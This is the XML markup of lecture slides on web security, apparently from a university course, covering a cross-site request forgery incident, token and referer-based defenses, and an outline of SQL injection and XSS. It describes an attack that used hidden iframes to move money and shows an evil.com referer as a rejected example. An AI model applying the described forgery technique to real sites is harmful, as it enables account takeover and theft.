          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17430" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317523EA-B8C2-F842-8156-34560B8E5894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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AB560C57-9FC3-A84F-BE65-D9D4E81D9A03}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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58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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A589F462-1BC5-8F43-A3A3-F60F721B5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XSRF True Story (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238F3093-72BC-3849-AE59-1370B0B7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7407AD74-242E-8B40-B353-5ED10834FB29}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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033" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7246209F-6B1E-7447-9A0D-EF6A32188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1066800"/>
            <a:ext cx="1766888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[Alex Stamos]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259A7B95-C408-324D-B868-FFF0D60EF3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1" y="1565276"/>
          <a:ext cx="8837613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Visio" r:id="rId3" imgW="5359400" imgH="2984500" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="5359400" imgH="2984500" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="1026" name="Object 5">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259A7B95-C408-324D-B868-FFF0D60EF3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1" y="1565276"/>
                        <a:ext cx="8837613" cy="491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Object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B86BA71-7C3A-EB40-BDAF-51BE0A259E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2251075"/>
          <a:ext cx="24384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Visio" r:id="rId5" imgW="1511300" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId5" imgW="1511300" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="78859" name="Object 11">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B86BA71-7C3A-EB40-BDAF-51BE0A259E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251075"/>
                        <a:ext cx="24384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0" name="Object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06694840-8234-8F46-B5CB-58DF7BB67F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1" y="2784476"/>
          <a:ext cx="23352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Visio" r:id="rId7" imgW="1511300" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId7" imgW="1511300" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="78860" name="Object 12">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06694840-8234-8F46-B5CB-58DF7BB67F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1" y="2784476"/>
                        <a:ext cx="233521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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0F8E4A-9699-5D42-9817-6C2E970554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632075"/>
          <a:ext cx="3581400" cy="255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Visio" r:id="rId9" imgW="2247900" imgH="1612900" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId9" imgW="2247900" imgH="1612900" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="78862" name="Object 14">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0F8E4A-9699-5D42-9817-6C2E970554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632075"/>
                        <a:ext cx="3581400" cy="255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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B986E3-DA11-7145-96B3-413F996E04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003675"/>
          <a:ext cx="25908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Visio" r:id="rId11" imgW="1600200" imgH="850900" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId11" imgW="1600200" imgH="850900" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="78863" name="Object 15">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B986E3-DA11-7145-96B3-413F996E04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003675"/>
                        <a:ext cx="25908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3B2A847-BB4F-204C-A3E2-C1DCD9288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00"/>
            <a:ext cx="4724400" cy="1754326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Hidden iframes submitted forms that…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Changed user’s email notification settings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Linked a new checking account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Transferred out $5,000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Unlinked the account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Restored email notifications </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562132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86699E0-022A-EB4B-B27A-D4E55D4E2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XSRF Defenses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8A5B0EE-9A66-914A-9FAF-2DB0EA326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Secret validation token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Referer validation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Custom HTTP header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068E9C38-6293-2648-8C04-5664BD540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6" y="614521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593" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1126983F-2196-4840-8815-D5EFC4758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6" y="2438400"/>
            <a:ext cx="5121275" cy="40005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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20486" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF3D5B6-CFD2-E24B-8828-C8B2B6C1C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2281239"/>
            <a:ext cx="81597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16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8851DFE4-113C-994B-9F0E-FD4A337FA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41750"/>
            <a:ext cx="12192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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7850F10-0C9F-1A47-B3D1-518AF3C25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334000"/>
            <a:ext cx="12509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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B9E8CC0-75FA-4347-A140-39F47CFFE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6" y="2209801"/>
            <a:ext cx="841375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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F895FE1-81B8-AE47-BF7F-7C4D57914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3810000"/>
            <a:ext cx="4698722" cy="707886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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.facebook.com/home.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719925C1-D66D-1E44-BE6B-9DD127BCD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6" y="5700713"/>
            <a:ext cx="4416425" cy="40005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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Requested-By: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest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20492" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0BEB31-8657-C94B-9BDB-AE8BA365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B5DE0BE3-1A03-0B48-A533-BF6F4E967376}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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78858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5AB52BD-98F0-9F43-802C-473C6A4D5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 Secret Token to Forms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EA6146DF-BC72-944D-8BB6-AEFC6FA003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305800" cy="4881563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Hash of user ID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can be forged by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>If attacker has access to HTML or URL of the page (how?), can learn session ID and hijack the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Session-independent nonce – Trac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can be overwritten by subdomains, network attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bind session ID to the token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>(how?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>CSRFx, CSRFGuard - manage state table at the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Keyed HMAC of session ID – no extra state!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EADB3780-F0AF-D44A-9BE3-D269D368B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6" y="614521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3DE350AC-DDAA-1342-A992-18083E7C2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6" y="1200150"/>
            <a:ext cx="5121275" cy="40005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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21510" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527C500E-7F79-A840-B6DB-196B0BC5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92106225-1379-9041-8E83-7EDFC0AB7D91}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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856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66F3895-F00D-FB42-BD3A-4CB9B9F66B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Secret Token: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0391FFCA-0046-324D-875C-C02078AD0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6" y="6145214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532" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05050C68-F339-ED45-B3C7-8BF65FF0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45216CB1-6311-A94B-9607-C8B3C66B7E9C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15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pic>
        <p:nvPicPr>
          <p:cNvPr id="22533" name="Content Placeholder 4" descr="Picture 13.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E2FE9F-FD97-CF4A-8608-639ACC179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82" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1495426"/>
            <a:ext cx="8458200" cy="505777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843648-808D-4048-9D7A-8BBC84DD54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1" y="5562600"/>
            <a:ext cx="8253413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br" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="42999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effec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9030C49-50AC-7142-9C77-7A77A5DFE907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="5681664"/>
            <a:ext cx="4078288" cy="47942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3655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8DF80B85-4530-C742-9D4E-5D14661097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Referer Validation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DA2EF9B-0CD8-B54D-930A-B70787FD6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4648200"/>
            <a:ext cx="8178800" cy="1409700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lenient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> referer checking – header is optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> referer checking – header is required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0DAE4BE9-3D19-6F4F-8372-A5D3F0CAE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400" y="1820863"/>
            <a:ext cx="4698722" cy="707886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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.facebook.com/home.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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E6618770-C414-BF41-A86E-3ABF367E4A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9264" y="1828801"/>
          <a:ext cx="3919537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Image" r:id="rId3" imgW="8077200" imgH="3632200" progId="Photoshop.Image.8">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="8077200" imgH="3632200" progId="Photoshop.Image.8">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="2050" name="Object 2">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6618770-C414-BF41-A86E-3ABF367E4A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4" y="1828801"/>
                        <a:ext cx="3919537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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0911A09-1971-3A4F-B9E3-3606E0EF8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400" y="2743200"/>
            <a:ext cx="4557658" cy="707886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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.evil.com/attack.html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E111771E-01EF-8745-8C23-67918BDFF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400" y="3649663"/>
            <a:ext cx="1454150" cy="40005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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a: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124D7152-4FB5-794F-B1EA-CBF9B1985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364" y="1524001"/>
            <a:ext cx="739305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5500">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="5500">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="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674BE6-A6CA-4C42-861D-46F345331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362200"/>
            <a:ext cx="6731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6000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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9E5F5E-CC91-6141-8727-D631BE4AF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888" y="3330576"/>
            <a:ext cx="4175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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2059" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA4EC94-01DA-284C-A21C-2788F643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FDCC20DB-5B15-C548-BA6E-FDD20E2700AA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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504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4" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="20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771F-7663-6746-B4F3-0E38C34F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98460-94F9-6842-BDB6-E4AAECF76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XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server side web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59037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9B28A857-B060-844E-A366-97BAA295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7EB9A403-67A5-2F44-8ABF-47F491380CB3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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A94B698-9971-FC4E-8CDA-64B7BE81E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524000"/>
            <a:ext cx="8001000" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Runs on a Web server (application server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Takes input from remote users via Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Interacts with back-end databases and other servers providing third-party content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Prepares and outputs results for users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ADAF8E35-2AC6-7841-A2A4-51D9D0099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Server Side of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82173853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374D64D-68D0-1A40-82B2-F46DFFC710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Web Application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396F0CB-E724-044F-BF0D-E89118D36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752600"/>
            <a:ext cx="1752600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA"/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 algn="ctr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Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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 algn="ctr"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 algn="ctr"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 algn="ctr"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434628" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741CB1CB-18A8-EE40-AFB6-4AA707751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2098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C51DC06A-F968-2F47-ABA9-6DA523426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752600"/>
            <a:ext cx="2362200" cy="1676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Web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434630" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740819DB-71AA-C348-AFD9-9EA27EEC3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401" y="1676401"/>
            <a:ext cx="2320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GET / HTTP/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434631" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4639021-1830-C24F-945D-F6D7981AEC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2667000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632" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B354E3F0-6EB7-8240-ADBD-FCD1862B0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2738438"/>
            <a:ext cx="2549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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35849" name="Picture 9" descr="ie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4788172A-C839-4545-952E-22DDFF5E9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2286001"/>
            <a:ext cx="6762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0" name="Picture 10" descr="safari">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0007DE7-A74C-6243-A256-E03DFE3E2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2328863"/>
            <a:ext cx="55721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1" name="Picture 11" descr="firefox">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC492D7-E40C-4842-A53E-9B5CFE340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2960689"/>
            <a:ext cx="557213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2" name="Picture 12" descr="opera">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0398D4-54F7-C14C-B174-5F99F90E2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962276"/>
            <a:ext cx="5842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637" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61F7CEBC-87F0-9741-A747-870A1F64F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1" y="3276601"/>
            <a:ext cx="1685925" cy="669925"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 1250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pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>index.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35854" name="Picture 16" descr="iis">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E39478-72C6-8E49-81D4-59D28A4DE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1947864"/>
            <a:ext cx="4381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5" name="Picture 17" descr="apache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A237A9A9-CA67-F94F-B7AC-98B30890C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911351"/>
